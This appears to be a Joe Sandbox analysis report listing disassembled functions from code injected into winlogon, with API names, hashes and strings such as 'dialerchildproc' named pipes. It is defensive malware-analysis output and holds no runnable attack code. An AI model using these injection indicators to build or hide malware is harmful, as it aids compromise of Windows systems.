                                                                                  • Part of subcall function 000001E85898D744: GetLastError.KERNEL32 ref: 000001E85898D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: f86b91cb66a3c6f8454f4038e5b621bb7ea2211ae881aec1b10a116c1fa3f1b4
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 96416E302312CAC6FAA8A735D5553FDF2425F847B8F541736AD3F476E7DE2888018A40
                                                                                Function 000001E858982244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: 51a05a011626c34f84d443abd0de517d886d5e25bc20737c8bb9c705d9869c07
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: A5211D36624781C2EB109B25F5543ADB7A1FB89BE5F504226EE5E02AA8DF7CC149CF00
                                                                                Function 000001E8589B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                                Function 000001E858959944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                                Function 000001E85898A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: fb0b219c5a3f278c8c4be7db907598bc1cd6189e151ec6c18a9f6efa96547db1
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                                Function 000001E85898F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                                Function 000001E85898104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                                Function 000001E85898D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
                                                                                Function 000001E858987510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
                                                                                Function 000001E858989DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                                Function 000001E858993DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                                Function 000001E858982F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                                Function 000001E85898CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                                Function 000001E85898199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                                Function 000001E8589836C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                                Function 000001E858988FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                                Function 000001E858981A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                                Function 000001E85898BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                                Function 000001E858983044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                                Function 000001E858985710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction ID: ff1100847cf1c0e0aadc7ec0e970ba072bd13cc79387902f55229e6ec2abdf55
                                                                                • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction Fuzzy Hash: 0361C436629A85CAE760DB55E45039EB7A0FB88784F504127EE8E87BA8DF7CC444CF00
                                                                                Function 000001E8589C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: b4ee51cf0a1e5aea1822e43a26c047e5dcf7f4fbb0b99cff55914cd4d144b702
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 7511E932AB0ED1D2FAA42528E4523EDBF806F59374F49873BAD7E067D6CE26C8417101
                                                                                Function 000001E858963504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 13a26281ade054cd1280fdbce72e43605aafa02c3cf2d887f28f1c2fac503938
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: D511A332A30AD191FA64192AE4413EDB1906F59374FD8873BBD6E076E6CE38C8417100
                                                                                Function 000001E858994104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 63986d8d169832ca2b3c9ff94d929ac1109ad7e490c18855dc707efbf0d460dd
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 5D11A3B2B30AD092F67A5569D4653EDB1477F783B8F090636AD7E077D6EE24C8414201
                                                                                Function 000001E8589BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 45fbb07566537809df07c08353ba596d2c45bc6c88eb3f332a9267d3a220cd63
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: A661C6766286C0CEFA658BA9E5443EEFAA0EF85746F508837CE0E177A5DF34C8458300
                                                                                Function 000001E85895F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: bbb57aa9e3b830d463c4fe85b52b4203214c9bc4de7028ccc68d76f93c744b6c
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 2761A2766206C0C2FA659B65E5443EEFAA1EF867A6F544837CE0E17BA4DF34C8458300
                                                                                Function 000001E85898AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: bb76fc1650d308761c410147ea84cb38f2e16afbcf0730215f2385a251eb584a
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 6C614633610A85CAEB209F65D4803DDB7A1FB48B88F044226EE4E17B99DF78C595CB02
